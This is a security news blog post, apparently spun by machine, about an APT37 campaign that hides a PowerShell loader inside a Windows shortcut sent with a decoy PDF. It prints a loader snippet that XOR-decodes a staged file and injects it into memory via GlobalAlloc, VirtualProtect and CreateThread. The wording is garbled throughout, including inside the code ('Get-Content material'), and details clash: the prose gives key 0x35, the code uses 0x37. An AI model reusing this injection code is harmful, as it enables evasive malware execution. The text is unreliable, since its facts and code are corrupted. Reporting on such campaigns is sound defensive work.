Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems

Posted on August 29, 2025August 29, 2025 By CWS

Attackers have begun leveraging a seemingly innocuous PDF publication alongside a malicious Home windows shortcut (LNK) file to infiltrate enterprise environments.

The assault surfaced in late August 2025, focusing on South Korean educational and authorities establishments beneath the guise of a legit “국가정보연구회 소식지 (52호)” PDF publication.

Victims obtain an archive containing each the PDF decoy and a companion .lnk file masquerading because the publication. When the shortcut is executed, a multi‐stage PowerShell loader embedded inside the LNK unpacks and deploys extra payloads completely in reminiscence, evading disk‐primarily based detection.

Early evaluation revealed that the LNK file hides three binary payloads at exact offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a remaining executable at 0x0015AED2.

Upon execution, a PowerShell one-liner inside the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, after which kicks off a batch script (aio03.bat) to decode and run the loader.

Seqrite analysts famous that this fileless method permits the attackers to bypass signature‐primarily based defenses by by no means writing the final word payload to disk.

Subsequent investigation by Seqrite researchers recognized that the ultimate payload, as soon as decrypted with a single‐byte XOR key (0x35), is injected instantly into reminiscence by way of Home windows API calls—GlobalAlloc, VirtualProtect, and CreateThread.

This reflective DLL injection approach ensures that the malicious code executes in a stealthy method, leaving minimal forensic artifacts.

Detailed reverse engineering of the loader binary uncovered surroundings checks for VMware instruments and sandbox evasion routines that stop execution in evaluation environments, confirming the excessive sophistication of the risk actor referred to as APT37.

Marketing campaign 1 an infection chain (Supply – Seqrite)

$exePath = “$env:temptony31.dat”
$exeFile = Get-Content material -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Size; $i++) {
$exeFile[$i] = $exeFile[$i] -bxor $key
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Size)
[Win32]::VirtualProtect($buf, $exeFile.Size, 0x40, [ref]$outdated)
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Size)
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)

An infection Mechanism

The an infection begins when the consumer double‐clicks the misleading .lnk file, which triggers PowerShell beneath the hood.

Marketing campaign 2 an infection chain (Supply – Seqrite)

The script parses its personal binary content material utilizing Get-Merchandise and ReadAllBytes, extracting the decoy PDF for show whereas staging the actual payloads.

As soon as staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script saved in aio02.dat, which in flip orchestrates the XOR decryption and reflective injection of aio01.dat.

By leveraging in-memory execution, the attackers sidestep typical endpoint safety platforms that depend on disk‐primarily based scanning.

This layered an infection chain, combining decoy paperwork, embedded payloads, and fileless strategies, underlines the evolving sophistication of state‐sponsored cyber espionage campaigns.

Increase your SOC and assist your group defend what you are promoting with free top-notch risk intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Compromise, File, Hackers, LNK, Malicious, PDF, Systems, Weaponize, Windows

Post navigation

Previous Post: Cyber Attacks Targeting Education Sector Surges Following Back-to-School Season
Next Post: VerifTools Fake ID Operation Dismantled by Law Enforcement

Related Posts

Writable File in Lenovo’s Windows Directory Enables a Stealthy AppLocker Bypass Cyber Security News
ArmouryLoader Bypassing System Security Protections and Inject Malicious Codes Cyber Security News
Building a Cyber Incident Response Plan That Works Cyber Security News
Hackers Exploiting .onmicrosoft.com Domains to Launch TOAD Scam Attack Cyber Security News
Google to Remove Two Certificate Authorities from Chrome Root Store Cyber Security News
CISA Warns of MongoDB Server Vulnerability(CVE-2025-14847) Exploited in Attacks Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Critical InputPlumber Vulnerabilities Allows UI Input Injection and Denial-of-Service
  • New Research Uncovers 28 Unique IP Addresses and 85 Domains Hosting Carding Markets
  • New ‘Penguin’ Pig Butchering as a Service Selling PII, Stolen Accounts and Fraud Kits
  • New EDRStartupHinder Tool blocks antivirus and EDR services at startup on Windows 11 25H2 Defender
  • Hackers Accessed University of Hawaii Cancer Center Patient Data; They Weren’t Immediately Notified

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Critical InputPlumber Vulnerabilities Allows UI Input Injection and Denial-of-Service
  • New Research Uncovers 28 Unique IP Addresses and 85 Domains Hosting Carding Markets
  • New ‘Penguin’ Pig Butchering as a Service Selling PII, Stolen Accounts and Fraud Kits
  • New EDRStartupHinder Tool blocks antivirus and EDR services at startup on Windows 11 25H2 Defender
  • Hackers Accessed University of Hawaii Cancer Center Patient Data; They Weren’t Immediately Notified

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark